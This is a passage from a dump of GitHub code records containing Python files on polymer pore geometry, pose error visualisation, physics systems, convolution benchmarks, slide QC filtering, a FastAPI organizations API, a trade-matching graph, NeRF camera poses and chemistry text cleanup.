pore_Radius)\n    except:\n        #brush is restricted\n        logging.debug(\"Restricted\")\n        phi_D = phi_D_restricted(chi, kappa, N, sigma, R, pore_Radius)\n    return phi_D\n\n#@lru_cache()\ndef D_universal(\n    chi : float, kappa : float, \n    N : float, sigma : float, \n    R : float, pore_Radius : float):\n    try:\n        D_ = D_unrestricted(chi, kappa, N, sigma, pore_Radius)\n        if D_>R: D_=R\n    except:\n        D_ = R\n    return D_\n\n\n################################################################################\ndef normalization_pore_opening(\n    chi : float, kappa : float, \n    N : float, sigma : float, phi_D : float\n    ):\n    def integrand(z, d):\n        return Phi(z = z, d=d,\n            chi = chi, kappa=kappa, phi_D=phi_D)*abs(d - z)\n    def integral(d):\n        return 2*np.pi*integrate.quad(integrand, 0, d, args=(d,))[0] - theta(N, sigma, d)\n    return integral\n\n#@lru_cache()\ndef opening_pore_Radius(\n    chi : float, kappa : float,\n    N : float, sigma : float,\n    
):\n phi_D = phi_D_unrestricted(chi)\n min_pore_R = 2*N*sigma\n if phi_D == 0: max_pore_R=N\n else: max_pore_R=2*N*sigma/phi_D\n normalization = normalization_pore_opening(chi, kappa, N, sigma, phi_D)\n pore_R = common.normalization_find_root(normalization, min_pore_R, max_pore_R)\n return pore_R\n\n\ndef normalization_chi_opening(\n kappa : float, \n N : float, sigma : float,\n R : float\n ):\n def integrand(z, chi):\n phi_D = phi_D_unrestricted(chi)\n return Phi(z = z, d=R,\n chi = chi, kappa=kappa, phi_D=phi_D)*abs(R - z)\n def integral(chi):\n return 2*np.pi*integrate.quad(integrand, 0, R, args=(chi,))[0] - theta(N, sigma, R)\n return integral\n\n#@lru_cache()\ndef chi_opening(\n kappa : float,\n N : float, sigma : float, R : float\n ):\n chi_min=0\n chi_max=1\n normalization = normalization_chi_opening(kappa, N, sigma, R)\n try:\n chi_open = brentq(normalization, chi_min, chi_max)\n except:\n chi_open = None\n return chi_open\n","repo_name":"miklakt/ascf_pb","sub_path":"ascf_pb/brush_geometry/pore.py","file_name":"pore.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71166285801","text":"from time_sync import magnitude\nimport numpy as np\nfrom mediapipe import solutions\nimport matplotlib.pyplot as plt\n\ndef calculate_error(capture, VIDEO):\n if not VIDEO.reference and capture.video.reference:\n return\n\n factor = len(VIDEO.Captures)/len(capture.video.Captures)\n\n u1 = capture.video.All_Normalized_Landmarks[capture.time]\n u2 = VIDEO.All_Normalized_Landmarks[int(capture.time * factor)]\n\n errors = np.array(u1) - np.array(u2)\n\n _ = []\n for i in range(len(errors)):\n _.append(magnitude(errors[i]))\n errors = _\n\n mean_error = np.mean(errors)\n\n connection_errors = []\n for connection in solutions.pose.POSE_CONNECTIONS:\n connection_errors.append((errors[connection[0]] + errors[connection[1]])*0.5)\n\n\n scaled_connection_errors = []\n for error in connection_errors:\n scaled_connection_errors.append((error - min(connection_errors)) / (max(connection_errors) - min(connection_errors)))\n\n _ = []\n __ = []\n for i in range(len(scaled_connection_errors)):\n _.append(list(solutions.pose.POSE_CONNECTIONS)[scaled_connection_errors.index(max(scaled_connection_errors))])\n __.append(max(scaled_connection_errors)*255)\n scaled_connection_errors[scaled_connection_errors.index(max(scaled_connection_errors))] = -1\n\n to_mark = dict(zip(_, __))\n\n return mean_error, to_mark\n\n\ndef visualize(capture, mean_errors, extraction_image, segmentation_image):\n images = [extraction_image, segmentation_image]\n\n for img in range(len(images)):\n fig = plt.figure(figsize=(images[img].shape[1] / 100, images[img].shape[0] / 500), facecolor=\"grey\")\n fig.add_subplot(121)\n plt.xlim([0, len(capture.video.Captures)])\n plt.ylim([0, 1])\n plt.plot(mean_errors)\n\n fig.add_subplot(122)\n plt.ylim([0, 1])\n plt.bar(1, mean_errors[-1])\n\n fig.canvas.draw()\n image_from_plot = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n image_from_plot = image_from_plot.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n\n fig.clf()\n\n images[img] = np.concatenate((images[img], image_from_plot), axis=0)\n\n return images[0], images[1]\n","repo_name":"efe-u/AI_Tennis_Coach","sub_path":"error_calculator.py","file_name":"error_calculator.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} 
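The error_calculator record that ends here subtracts two landmark sets, takes a per-landmark magnitude, and averages the result. A compact numpy sketch of that core step follows, assuming time_sync.magnitude is a Euclidean norm (the arrays are synthetic; 33 is the MediaPipe pose landmark count).

import numpy as np

def mean_landmark_error(u1, u2):
    diffs = np.asarray(u1) - np.asarray(u2)     # (n_landmarks, 3) coordinate deltas
    magnitudes = np.linalg.norm(diffs, axis=1)  # one Euclidean distance per landmark
    return magnitudes.mean()

u1 = np.random.rand(33, 3)  # synthetic stand-ins for two time-synced pose captures
u2 = np.random.rand(33, 3)
print(mean_landmark_error(u1, u2))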
+{"seq_id":"70130598441","text":"from src.ecs.clocks import delta_time\nfrom src.ecs.requirements.has import has\n\n\ndef apply_force(tractor):\n if tractor.traction_enabled:\n print('Traction enabled')\n tractor.velocity += \\\n tractor.traction_direction.rotated(\n tractor.rotation\n if hasattr(tractor, \"rotation\") else 0) \\\n * tractor.traction_force \\\n * delta_time() \\\n / tractor.mass\n\n\ntraction = (\n (\"tractor\" |\n has(\"velocity\") &\n has(\"traction_force\") &\n has(\"traction_direction\") &\n has(\"mass\")\n ) >> apply_force,\n)\n","repo_name":"girvel/DyingSpace","sub_path":"src/systems/physics/traction/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71180662761","text":"from conv import Conv2D\nfrom PIL import Image\nfrom torchvision import transforms, utils\nfrom torch.autograd import Variable\nfrom torchvision.utils import save_image as save\nimport torch\nimport uuid\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef save_outputs(output_image, task_name):\n for image in output_image:\n save(image, str(uuid.uuid4()) + \"_\" + task_name + \".png\")\n\nif __name__ == '__main__':\n cat1 = Image.open(\"cat2.jpg\")\n loader = transforms.Compose([transforms.ToTensor()])\n image = Variable(loader(cat1)).data\n #task 1\n conv2d_1 = Conv2D(in_channel=3, o_channel=1, kernel_size=3, stride=1)\n num_op, output_image = conv2d_1.forward(image)\n #num_op, output_image = conv2d_1.scipy_convolve(image)\n print(\"task 1: \", num_op)\n save_outputs(output_image, \"task1\")\n #task 2\n conv2d_2 = Conv2D(in_channel=3, o_channel=2, kernel_size=5, stride=1)\n num_op, output_image = conv2d_2.forward(image)\n #num_op, output_image = conv2d_2.scipy_convolve(image)\n print(\"task 2: \", num_op)\n save_outputs(output_image, \"task2\")\n #task 3\n conv2d_3 = Conv2D(in_channel=3, o_channel=3, kernel_size=3, stride=2)\n num_op, output_image = conv2d_3.forward(image)\n print(\"task 3: \", num_op)\n save_outputs(output_image, \"task3\")\n\n #part B\n if conv2d_1.set_mode('rand'):\n times = []\n for i in range(11):\n if conv2d_1.set_o_channel(2 ** i):\n start = datetime.now()\n numops, output_image = conv2d_1.forward(image)\n delta = datetime.now()-start\n print(i, 2 ** i, delta)\n times.append(delta)\n np.save(\"times\", times)\n plt.plot(range(11), times)\n plt.show()\n\n #part C\n if conv2d_2.set_mode('rand'):\n times = []\n for i in range(3, 13, 2):\n if conv2d_2.set_kernel_size(i):\n numops, output_image = conv2d_2.forward(image)\n print(i, numops)\n times.append(numops)\n np.save(\"ctimes\", times)\n plt.plot(range(3, 13, 2), times)\n plt.show()\n","repo_name":"exponentialbit1024/PurdueCS","sub_path":"BME495/hw1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7300316025","text":"\"\"\"Gaussian filter QC algorithm.\"\"\"\n\nimport numpy as np\nimport slideflow as sf\nimport skimage\nfrom slideflow import errors\nfrom typing import Union\n\nclass Gaussian:\n\n def __init__(\n self,\n mpp: float = 4,\n sigma: int = 3,\n threshold: float = 0.02\n ) -> None:\n \"\"\"QC via Gaussian filtering.\n\n Args:\n mpp (float): Microns-per-pixel at which to perform filtering.\n Defaults to 4.\n sigma (int): Sigma (radius) for Gaussian filter. Defaults to 3.\n threshold (float): Gaussian threshold. 
Defaults to 0.02.\n        \"\"\"\n        self.mpp = mpp\n        self.sigma = sigma\n        self.threshold = threshold\n\n    def __repr__(self):\n        return \"Gaussian(mpp={!r}, sigma={!r}, threshold={!r})\".format(\n            self.mpp, self.sigma, self.threshold\n        )\n\n    def _thumb_from_slide(\n        self,\n        wsi: \"sf.WSI\"\n    ) -> np.ndarray:\n        \"\"\"Get a thumbnail from the given slide.\n\n        Args:\n            wsi (sf.WSI): Whole-slide image.\n\n        Returns:\n            np.ndarray: RGB thumbnail of the whole-slide image.\n        \"\"\"\n        thumb = wsi.thumb(mpp=self.mpp)\n        if thumb is None:\n            raise errors.QCError(\n                f\"Thumbnail error for slide {wsi.shortname}, QC failed\"\n            )\n        thumb = np.array(thumb)\n        if thumb.shape[-1] == 4:\n            thumb = thumb[:, :, :3]\n        return thumb\n\n    def __call__(\n        self,\n        wsi: Union[\"sf.WSI\", np.ndarray],\n    ) -> np.ndarray:\n        \"\"\"Perform Gaussian filtering on the given slide or image.\n\n        Args:\n            wsi (sf.WSI, np.ndarray): Either a Slideflow WSI or a numpy array,\n                with shape (h, w, c) and type np.uint8.\n\n        Returns:\n            np.ndarray: QC boolean mask, where True = filtered out.\n        \"\"\"\n        if isinstance(wsi, sf.WSI):\n            thumb = self._thumb_from_slide(wsi)\n        else:\n            thumb = wsi\n\n        gray = skimage.color.rgb2gray(thumb)\n        img_laplace = np.abs(skimage.filters.laplace(gray))\n        gaussian = skimage.filters.gaussian(img_laplace, sigma=self.sigma)\n        mask = gaussian <= self.threshold\n\n        # Assign blur burden value (plain ndarray input has no qc_mask)\n        existing_qc_mask = getattr(wsi, \"qc_mask\", None)\n        if isinstance(wsi, sf.WSI) and existing_qc_mask is not None:\n            mask = skimage.transform.resize(mask, existing_qc_mask.shape)\n            mask = mask.astype(bool)\n            blur = np.count_nonzero(\n                np.logical_and(\n                    mask,\n                    np.logical_xor(mask, existing_qc_mask)\n                )\n            )\n            wsi.blur_burden = blur / (mask.shape[0] * mask.shape[1])\n            sf.log.debug(f\"Blur burden: {wsi.blur_burden}\")\n\n        return mask","repo_name":"abdulkarimab/slideflow","sub_path":"slideflow/slide/qc/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"23164626092","text":"from typing import List\nfrom uuid import UUID\n\nfrom fastapi import APIRouter, Depends, HTTPException, Response, status\n\nfrom app.api.dependencies import get_api_key, get_db\nfrom app.db.database import MSSQLConnection\nfrom app.schemas.organizations import (\n    OrganizationCreateRequest,\n    OrganizationResponse,\n    OrganizationUpdateRequest,\n)\nfrom app.services.exceptions import (\n    InternalDatabaseError,\n    InvalidAuthenticationKeyForRequest,\n)\nfrom app.services.organizations import OrganizationService\n\nrouter = APIRouter()\n\n\n@router.get(\"\", response_model=List[OrganizationResponse])\nasync def list_organizations(\n    db: MSSQLConnection = Depends(get_db),\n) -> List[OrganizationResponse]:\n    \"\"\"\n    **Retrieves the list of organizations.**\n    \"\"\"\n    # TODO: Filter by name\n    return await OrganizationService(db).get_multi()\n\n\n@router.get(\n    \"/{organization_id}\",\n    response_model=OrganizationResponse,\n    responses={\n        status.HTTP_404_NOT_FOUND: {\n            \"description\": \"The organization with the specified id could not \"\n            \"be found.\"\n        }\n    },\n)\nasync def retrieve_organization_by_id(\n    organization_id: int, db: MSSQLConnection = Depends(get_db)\n) -> OrganizationResponse:\n    \"\"\"\n    **Retrieves an organization with the id from the `organization_id` path\n    parameter.**\n    \"\"\"\n    organization = await OrganizationService(db).get(organization_id)\n    if organization is None:\n        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND)\n    return 
organization\n\n\n@router.post(\n \"\",\n response_model=OrganizationResponse,\n responses={\n status.HTTP_401_UNAUTHORIZED: {\"description\": \"Invalid credentials.\"},\n status.HTTP_403_FORBIDDEN: {\n \"description\": \"Invalid permissions or credentials.\"\n },\n },\n)\nasync def create_organization(\n body: OrganizationCreateRequest,\n db: MSSQLConnection = Depends(get_db),\n api_key: UUID = Depends(get_api_key),\n) -> OrganizationResponse:\n \"\"\"\n **Creates a new organization with the entity enclosed in the request\n body.** On success, the new organization is returned in the body of the\n response.\n \"\"\"\n try:\n organization = await OrganizationService(db).create(body, api_key)\n except InvalidAuthenticationKeyForRequest as e:\n raise HTTPException(status.HTTP_403_FORBIDDEN, e.message)\n except InternalDatabaseError:\n raise HTTPException(status.HTTP_500_INTERNAL_SERVER_ERROR)\n return organization\n\n\n@router.put(\n \"/{organization_id}\",\n response_model=OrganizationResponse,\n responses={\n status.HTTP_401_UNAUTHORIZED: {\"description\": \"Invalid credentials.\"},\n status.HTTP_403_FORBIDDEN: {\n \"description\": \"Invalid permissions or credentials.\"\n },\n status.HTTP_404_NOT_FOUND: {\n \"description\": \"The organization with the specified id could not \"\n \"be found.\"\n },\n },\n)\nasync def update_organization(\n organization_id: int,\n body: OrganizationUpdateRequest,\n db: MSSQLConnection = Depends(get_db),\n api_key: UUID = Depends(get_api_key),\n) -> OrganizationResponse:\n \"\"\"\n **Updates an organization with the id from the `organization_id` path\n parameter with the entity enclosed in the request body.** On success,\n the updated organization is returned in the body of the response.\n \"\"\"\n # Check if organization with the id exists\n organization = await OrganizationService(db).get(organization_id)\n if not organization:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND)\n # Perform update\n try:\n organization = await OrganizationService(db).update(\n organization_id, body, api_key\n )\n except InvalidAuthenticationKeyForRequest as e:\n raise HTTPException(status.HTTP_403_FORBIDDEN, e.message)\n except InternalDatabaseError:\n raise HTTPException(status.HTTP_500_INTERNAL_SERVER_ERROR)\n return organization\n\n\n@router.delete(\n \"/{organization_id}\",\n status_code=status.HTTP_204_NO_CONTENT,\n responses={\n status.HTTP_204_NO_CONTENT: {\n \"description\": \"The organization with the specified id has been \"\n \"successfully deleted.\"\n },\n status.HTTP_401_UNAUTHORIZED: {\"description\": \"Invalid credentials.\"},\n status.HTTP_403_FORBIDDEN: {\n \"description\": \"Invalid permissions or credentials.\"\n },\n status.HTTP_404_NOT_FOUND: {\n \"description\": \"The organization with the specified id could not \"\n \"be found.\"\n },\n },\n)\nasync def delete_organization_by_id(\n organization_id: int,\n db: MSSQLConnection = Depends(get_db),\n api_key: UUID = Depends(get_api_key),\n) -> Response:\n \"\"\"\n **Deletes an organization with the id from the `organization_id` path\n parameter.**\n \"\"\"\n # Check if organization with the id exists\n organization = await OrganizationService(db).get(organization_id)\n if not organization:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND)\n # Perform deletion\n try:\n await OrganizationService(db).delete(organization_id, api_key)\n except InvalidAuthenticationKeyForRequest as e:\n raise HTTPException(status.HTTP_403_FORBIDDEN, e.message)\n except InternalDatabaseError:\n raise 
HTTPException(status.HTTP_500_INTERNAL_SERVER_ERROR)\n return Response(status_code=status.HTTP_204_NO_CONTENT)\n","repo_name":"Vaccine-Hunters-Canada/VaxFinder-backend","sub_path":"app/api/api_v1/endpoints/organizations.py","file_name":"organizations.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"18"} +{"seq_id":"69823014119","text":"n, m = list(map(int, input().split()))\nfibRem = [0, 1, 1]\nsearch = [0, 1, 1]\nfound = False\nwhile True:\n x = (fibRem[-1] + fibRem[-2]) % m\n fibRem.append(x)\n search.append(x)\n search.pop(0)\n if search == [0, 1, 1]:\n fibRem = fibRem[:-3]\n break\n#print(fibRem)\nn = n % len(fibRem)\nprint(fibRem[n])\n","repo_name":"Keshav077/Coursera-Assignments","sub_path":"Algorithmic Tools/Week 2/Fibonacci Number Again.py","file_name":"Fibonacci Number Again.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72352335719","text":"import networkx as nx\nimport csv\n\n\n# parses the csv file and returns the data which is a list of lists\ndef parse_data(csv_file):\n with open(csv_file) as f:\n csv_f = csv.reader(f)\n\n data = []\n\n for row in csv_f:\n item = []\n for col in row:\n item.append(col)\n data.append(item)\n\n return data\n\n\n# calculates the weight for the inputted edge.\ndef calc_weight(G, a, b):\n if G.node[a][\"Country\"] == G.node[b][\"Country\"]:\n if G.node[a][\"State\"] == G.node[b][\"State\"]:\n if G.node[a][\"City\"] == G.node[b][\"City\"]:\n return 1\n else:\n return 2\n else:\n return 4\n else:\n return 9\n\n\n# adds vertices from the data to the graph\ndef add_vertices(G, data):\n for i in range(len(data)):\n G.add_node(int(data[i][0]), Country=data[i][1], State=data[i][2],\n City=data[i][3], Name=data[i][4], Offering=data[i][5],\n #OfferingCategory=data[i][6] ,\n Seeking=data[i][6],\n #SeekingCategory=data[i][8],\n URL=data[i][7])\n\n\n# adds edges from the data to the graph\ndef add_edges(G):\n for offering_node in G.node:\n for seeking_node in G.node:\n if (offering_node != seeking_node) and (\n G.node[offering_node]['Offering'] in G.node[seeking_node]['Seeking']):\n G.add_edge(offering_node, seeking_node, weight=calc_weight(G, offering_node, seeking_node))\n\n\n# def category_heuristic(a, b):\n# if G.node[a][\"OfferingCategory\"] == G.node[b][\"OfferingCategory\"]:\n# return 1\n# else:\n# return 3\n\n# creates two lists seekingList, offeringList for checking if an item exists in the graph\ndef create_items_lists(data):\n seekingList = []\n offeringList = []\n for i in range(len(data)):\n offeringList.append(data[i][6])\n seekingList.append(data[i][5])\n return seekingList, offeringList\n\n\n# runs the parse method and lists method. 
then creates the graph\ndef parse_and_init(csv_file):\n    data = parse_data(csv_file)\n\n    seekingList, offeringList = create_items_lists(data)\n\n    G = nx.DiGraph()\n    add_vertices(G, data)\n    add_edges(G)\n\n    return G, seekingList, offeringList\n\ndef find_index_matches_in_seeking(word, lst):\n    indexes = []\n    for i in range(len(lst)):\n        if word in lst[i]:\n            indexes.append(i)\n    return indexes\n\ndef find_index_matches_in_offering(word, lst):\n    indexes = []\n    for i in range(len(lst)):\n        if word == lst[i]:\n            indexes.append(i)\n    return indexes\n\n\n# first checks if the items exist and then searches for the shortest path\ndef search_match(graph, seekingList, offeringList, seeking_product, offering_product):\n    seekingIdxOccurrence = find_index_matches_in_seeking(seeking_product, seekingList)\n    if len(seekingIdxOccurrence) == 0:\n        return \"noSeek\"\n\n    offeringIdxOccurrence = find_index_matches_in_offering(offering_product, offeringList)\n    if len(offeringIdxOccurrence) == 0:\n        return \"noHave\"\n\n    paths = []\n    for idx_offer in offeringIdxOccurrence:\n        for idx_seek in seekingIdxOccurrence:\n            try:\n                paths.append(nx.astar_path(graph, idx_offer,\n                                           idx_seek))\n            except nx.NetworkXNoPath:\n                pass\n    items_list = []\n    url_list = []\n    if len(paths) != 0:\n        best_path = min(paths)\n        for node in best_path:\n            items_list.append(graph.node[node][\"Offering\"])\n            url_list.append(graph.node[node][\"URL\"])\n        return {\"items\": items_list, \"link\": url_list}\n    else:\n        return \"noPath\"\n\n\n# nx.write_graphml(G, \"plot1.graphml\")\n\n","repo_name":"AsafEtzion/TradeUp","sub_path":"flatty/theme/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"20779217310","text":"from imports import tf, np\n\ndef get_translation_t(t):\n    \"\"\"Get the translation matrix for movement in t.\"\"\"\n    matrix = [\n        [1, 0, 0, 0],\n        [0, 1, 0, 0],\n        [0, 0, 1, t],\n        [0, 0, 0, 1],\n    ]\n    return tf.convert_to_tensor(matrix, dtype=tf.float32)\n\n\ndef get_rotation_phi(phi):\n    \"\"\"Get the rotation matrix for movement in phi.\"\"\"\n    matrix = [\n        [1, 0, 0, 0],\n        [0, tf.cos(phi), -tf.sin(phi), 0],\n        [0, tf.sin(phi), tf.cos(phi), 0],\n        [0, 0, 0, 1],\n    ]\n    return tf.convert_to_tensor(matrix, dtype=tf.float32)\n\n\ndef get_rotation_theta(theta):\n    \"\"\"Get the rotation matrix for movement in theta.\"\"\"\n    matrix = [\n        [tf.cos(theta), 0, -tf.sin(theta), 0],\n        [0, 1, 0, 0],\n        [tf.sin(theta), 0, tf.cos(theta), 0],\n        [0, 0, 0, 1],\n    ]\n    return tf.convert_to_tensor(matrix, dtype=tf.float32)\n\n\ndef pose_spherical(theta, phi, t):\n    \"\"\"\n    Get the camera to world matrix for the corresponding theta, phi\n    and t.\n    \"\"\"\n    c2w = get_translation_t(t)\n    c2w = get_rotation_phi(phi / 180.0 * np.pi) @ c2w\n    c2w = get_rotation_theta(theta / 180.0 * np.pi) @ c2w\n    c2w = np.array([[-1, 0, 0, 0], [0, 0, 1, 0], [0, 1, 0, 0], [0, 0, 0, 1]]) @ c2w\n    return c2w\n\ndef sample_random_c2w():\n\ttheta = np.random.uniform(0., 360.)\n\tphi = np.random.uniform(-10., 90.)\n\tt = np.random.uniform(1.0, 1.5)\n\treturn pose_spherical(theta, phi, t)","repo_name":"NuoWenLei/DreamFusionImplementation","sub_path":"NeRF_camera.py","file_name":"NeRF_camera.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26115432350","text":"import regex\n\nfrom chemdataextractor.doc import Paragraph\n\nfrom error import DatabaseError\n\n\ndef 
cleanup_text(para):\n    \"\"\"Clean-up paragraph code\n    :param para: (str or doc.Paragraph) Paragraph of paper\n    :return: (str) clean up text\n    \"\"\"\n\n    def remove_dot(sentence):\n        output = sentence.text\n        if output[-1] in \".!?\":\n            output = output[:-1]\n        return output\n\n    if isinstance(para, str):\n        para = Paragraph(para)\n\n    text = ' -end- '.join(map(remove_dot, para.sentences))\n    text = text.replace('\\n', \" \")\n\n    text = regex.sub(r\"i\\.e\\.(?=,|\\s)\", \"that is\", text)  # remove i.e.\n    text = regex.sub(r\"e\\.g\\.(?=,|\\s)\", \"for example\", text)  # remove e.g.\n    text = regex.sub(r\"al\\.,\", \"al. and\", text)\n    text = regex.sub(r\"vs\\s?\\.\", 'vs', text)  # change vs. -> vs\n\n    # change unicode\n    text = regex.sub(r\"[\\u2000-\\u2005\\u2007\\u2008]|\\xa0\", \" \", text)\n    text = regex.sub(r\"[\\u2006\\u2009-\\u200F|\\u00ad]\", \"\", text)\n    text = regex.sub(r\"[\\u2010-\\u2015]|\\u2212\", \"-\", text)\n    text = regex.sub(r\"≈|∼\", \"~\", text)\n    text = regex.sub(r\"\\u2032|\\u201B|\\u2019\", \"'\", text)\n    text = regex.sub(r\"\\u2215\", \"/\", text)\n    text = regex.sub(r\"\\u201A\", ',', text)\n    text = regex.sub(r\"\\u201C|\\u201D|\\u2033\", '\"', text)\n\n    text = regex.sub(r\"\\s?\\b[.][,-]+\\s?\", \" -end- \", text)  # remove \".-\" or \".,,\" pattern\n    text = regex.sub(r\"\\[\\s([,-]\\s)*\\]\", '', text)  # remove [ , , ]\n    text = regex.sub(r\"\\[([,-])+\\]\", '', text)  # remove [,,]\n    text = regex.sub(r\"\\b(([A-Za-z]{2,})[,.]\\d+[A-Za-z]?)\\b\", lambda t: t.group(2) + \" -end- \", text)\n    text = regex.sub(r\"(?<=\\s)[.,-](?=\\s)\", \" \", text)  # remove .,- between blanks\n    text = regex.sub(r\"\\[\\]|\\(\\)|{}\", '', text)  # remove (), [], {}\n    text = regex.sub(r\"\\u2022|\\u2024|\\u2027|\\u00B7\", r\"\\u22C5\", text)\n\n\n    # separate equality, inequality sign\n    text = regex.sub(r\"(\\s?[\\u221F-\\u2281|\\u2284-\\u22C3\\u22CD-\\u22FF:;=><~]\\s?)\", lambda t: \" {} \".format(t.group(1)), text)\n\n    figure_table = r\"(\\b([Ff]igure|[Tt]able|[Gg]raph|[Ss]cheme|[Ff]ig)(s|es)?(?:(?:[,]|and|[.]|\\s|[-]|\\B)+(?:S?\\d+|[A-Za-z]){1,2}\\b(?:\\s?[(][A-Za-z1-9][)]\\B)?)+?)\"\n    text = regex.sub(figure_table, string=text, repl=lambda t: t.group(2))\n    text = regex.sub(r\"(([(])?(Fig|Table|Figure|ESI)\\s?†(?(2)[)]))\", string=text, repl=\"\")\n\n    # orbital (3p1/2 -> p'orbital)\n    text = regex.sub(r\"([1-9]([spdfg])\\s?[13579]\\s?[/]\\s?2)\", lambda t: \"{}'orbital\".format(t.group(2)), text)\n\n    # type II curve -> -type-\n    roman_num = r\"\\b(?:iv|ix|(?:v|x)i{0,3}|i{1,3})\\b\"\n    types = r'(?i)type(\\s-\\s|-|\\s)?(?P<b>\\()?' + roman_num + r'(?(b)\\))(\\s-\\s|-|\\s)?(curve)?'\n    text = regex.sub(types, \" -type-\", text)\n\n    # Lee et al. -> -paper-\n    text = regex.sub(pattern=r\"(\\s?\\b\\S+\\set\\.?\\sal(\\.)?(?(2)\\B|\\b)\\s?)\", string=text, repl=\" -paper- \")\n\n    # https://email@domain -> -email-\n    text = regex.sub(r\"((https?://)?\\S+[.](com|net|org|edu)(/\\S+)?)(?=\\s|$)\", \" -email- \", text)\n\n    # isotope with NMR\n    text = regex.sub(r\"(?P<atom>1H|2H|6Li|11B|13C|15N|19F|29Si|31P|195Pt)\\s?\\S*(nmr|NMR)\",\n                     lambda t: \"{}-NMR\".format(t.group(\"atom\")), text)\n    # .,:;\n    text = regex.sub(r'(?P<A>(?<=\\S+)[.,:;\\\"](?=\\S+))|(?P<OL>
    (?<=(^|\\s|\\(|\\))[A-Za-z])[.\"](?=\\s|\\(|\\)|$))|[.,:;\"]',\n lambda t: t.group() if t.group(\"A\") or t.group(\"OL\") else \" {} \".format(t.group()), text)\n\n # lower first letter\n text = regex.sub(r\"(?<=(^|-end-)\\s*)(?P[A-Z][a-z]+)(?=\\s|$)\", lambda t: t.group('word').lower(), text)\n\n # remove apostrophe s ('s)\n text = regex.sub(r\"(?<=\\S+)'s(?=\\s|$)\", \" \", text)\n\n # separate bracket\n queue_bracket = []\n small_queue = []\n activation = True\n first_activation = False\n poly_activation = None\n\n for i, char in enumerate(text):\n if char in '({':\n small_queue.append(i)\n try:\n if text[i - 4:i] == 'poly':\n poly_activation = i\n elif activation:\n first_activation = True\n activation = False\n except IndexError:\n pass\n\n elif char == \" \" and not poly_activation:\n activation = True\n first_activation = False\n\n if small_queue:\n queue_bracket += small_queue\n small_queue.clear()\n\n elif char in ')}':\n if small_queue:\n pop_index = small_queue.pop()\n\n if poly_activation and not (poly_activation - pop_index):\n poly_activation = None\n\n elif not small_queue and first_activation:\n try:\n if text[i + 1] == ' ':\n queue_bracket.append(pop_index)\n queue_bracket.append(i)\n except IndexError:\n queue_bracket.append(pop_index)\n queue_bracket.append(i)\n\n first_activation = False\n else: # Already removed\n queue_bracket.append(i)\n else:\n activation = False\n\n queue_bracket += small_queue\n\n revised_text = \"\"\n for i, char in enumerate(text):\n if i in queue_bracket:\n revised_text += \" {} \".format(char)\n else:\n revised_text += char\n\n # Remove 'a' and 'the'\n revised_text = regex.sub(r\"(?<=^|\\s)(?:a|the|an)(?=\\s|$)\", \" \", revised_text).strip()\n\n revised_text = regex.sub(r\"\\s+\", \" \", revised_text)\n return revised_text\n\n\ndef split_text(text, concat_bracket=False):\n split = text.split()\n new_split = []\n activation = False\n for word in split:\n if regex.match(r\"^-(num|strange)\\(\", word):\n if regex.match(r\".+\\)-$\", word):\n pass\n else:\n activation = True\n new_split.append(word)\n elif activation:\n if regex.match(r\".+\\)-$\", word):\n activation = False\n new_split[-1] += \" \" + word\n else:\n new_split.append(word)\n\n if not concat_bracket:\n return new_split\n\n right_bracket = regex.compile(r\"\\)|\\]|\\}\")\n left_bracket = regex.compile(r\"\\(|\\[|\\{\")\n mini_batch = []\n batch = []\n activation = 0\n for word in new_split:\n if activation:\n mini_batch.append(word)\n rb = right_bracket.findall(word)\n lb = left_bracket.findall(word)\n if len(rb) - len(lb) == 1:\n activation = 0\n batch.append(\" \".join(mini_batch))\n mini_batch.clear()\n elif activation:\n activation -= 1\n else:\n assert activation == 0\n batch += mini_batch\n mini_batch.clear()\n else:\n lb = left_bracket.findall(word)\n if not lb:\n batch.append(word)\n else:\n rb = right_bracket.findall(word)\n if len(lb) - len(rb) == 1 and word not in ['(', '[', '{']:\n mini_batch.append(word)\n activation = 3\n else:\n batch.append(word)\n\n return batch\n\n\ndef identify_tag(label: str):\n if not label:\n return None\n elif regex.match(r\"^-num([(].+[)])?-$\", label):\n return \"number\"\n elif regex.match(r\"^-strange\\(.+\\)-$\", label):\n return 'strange'\n\n tag = regex.match(r\"^-(?Pc|u|n|a|e|i|s)\\d\\d\\d\\d\\d\\d-$\", label)\n if not tag:\n return None\n tag_v = tag.group('tag')\n tag_dict = {'c': 'chemical', 'n': 'number', 'u': 'unit', 'e': 'element', 's': 'small_molecule', 'i': 'ion'}\n return tag_dict[tag_v]\n\n\ndef get_name(word, 
